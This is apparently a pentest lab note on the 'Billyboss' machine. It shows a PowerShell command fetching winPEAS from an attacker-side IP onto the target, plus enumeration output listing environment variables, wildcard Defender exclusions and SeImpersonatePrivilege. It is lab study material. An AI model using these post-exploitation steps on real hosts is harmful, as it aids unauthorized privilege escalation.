InfoSec LAB

Billyboss_Automated

Created: 2 min read

PEAS

Conducting an automated enumeration after performing a manual enumeration

PS C:\tmp> iwr -uri http://192.168.45.245/winPEASx64.exe -Outfile .\winPEASx64.exe

Delivery complete

Executing PEAS

ENV

����������͹ User Environment Variables
� Check for some passwords or keys in the env variables 
    COMPUTERNAME: BILLYBOSS
    USERPROFILE: C:\Users\nathan
    PUBLIC: C:\Users\Public
    LOCALAPPDATA: C:\Users\nathan\AppData\Local
    PSModulePath: C:\Users\nathan\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    PROCESSOR_ARCHITECTURE: AMD64
    Path: C:\Users\nathan\Nexus\nexus-3.21.0-05\bin\..\lib;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\dotnet\;C:\Program Files (x86)\dotnet\;C:\Users\nathan\AppData\Local\Microsoft\WindowsApps;c:\users\nathan\nexus\nexus-3.21.0-05\jre\bin
    CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
    ProgramFiles(x86): C:\Program Files (x86)
    PROCESSOR_LEVEL: 25
    ProgramFiles: C:\Program Files
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
nce: BypasstionPolicyPrefere
    SystemRoot: C:\Windows
    ALLUSERSPROFILE: C:\ProgramData
    DriverData: C:\Windows\System32\Drivers\DriverData
    ProgramData: C:\ProgramData
    PROCESSOR_REVISION: 0101
    USERNAME: nathan
    CommonProgramW6432: C:\Program Files\Common Files
    OneDrive: C:\Users\nathan\OneDrive
    CommonProgramFiles: C:\Program Files\Common Files
    OS: Windows_NT
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    ComSpec: C:\Windows\system32\cmd.exe
    PROMPT: $P$G
    SystemDrive: C:
    TEMP: C:\Users\nathan\AppData\Local\Temp
    NUMBER_OF_PROCESSORS: 1
    APPDATA: C:\Users\nathan\AppData\Roaming
    TMP: C:\Users\nathan\AppData\Local\Temp
    ProgramW6432: C:\Program Files
    windir: C:\Windows
    USERDOMAIN: BILLYBOSS
 
����������͹ System Environment Variables
� Check for some passwords or keys in the env variables 
    ComSpec: C:\Windows\system32\cmd.exe
    DriverData: C:\Windows\System32\Drivers\DriverData
    OS: Windows_NT
    Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\dotnet\;C:\Program Files (x86)\dotnet\
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
    PROCESSOR_ARCHITECTURE: AMD64
    PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    TEMP: C:\Windows\TEMP
    TMP: C:\Windows\TEMP
    USERNAME: SYSTEM
    windir: C:\Windows
    NUMBER_OF_PROCESSORS: 1
    PROCESSOR_LEVEL: 25
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    PROCESSOR_REVISION: 0101

LAPS

LSA Protection

Credentials Guard

Cached Creds

AV

����������͹ Windows Defender configuration
  Local Settings
 
  Path Exclusions:
    C:\
    D:\
    E:\
    F:\
    G:\
    H:\
    I:\
    J:\
    K:\
    L:\
    M:\
    N:\
    O:\
    P:\
    Q:\
    R:\
    S:\
    T:\
    U:\
    V:\
    W:\
    X:\
    Y:\
    Z:\
 
  PolicyManagerPathExclusions:
    C:\
    D:\
    E:\
    F:\
    G:\
    H:\
    I:\
    J:\
    K:\
    L:\
    M:\
    N:\
    O:\
    P:\
    Q:\
    R:\
    S:\
    T:\
    U:\
    V:\
    W:\
    X:\
    Y:\
    Z:\
 
  Process Exclusions
    C:\*
    D:\*
    E:\*
    F:\*
    G:\*
    H:\*
    I:\*
    J:\*
    K:\*
    L:\*
    M:\*
    N:\*
    O:\*
    P:\*
    Q:\*
    R:\*
    S:\*
    T:\*
    U:\*
    V:\*
    W:\*
    X:\*
    Y:\*
    Z:\*
  Group Policy Settings

UAC

PowerShell History

C:\Users\nathan\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Drives

NTLM

.NET

Current Token Privileges

SeImpersonatePrivilege This has been already enumerated manually

Interactive Graph View

Backlinks

  • No backlinks found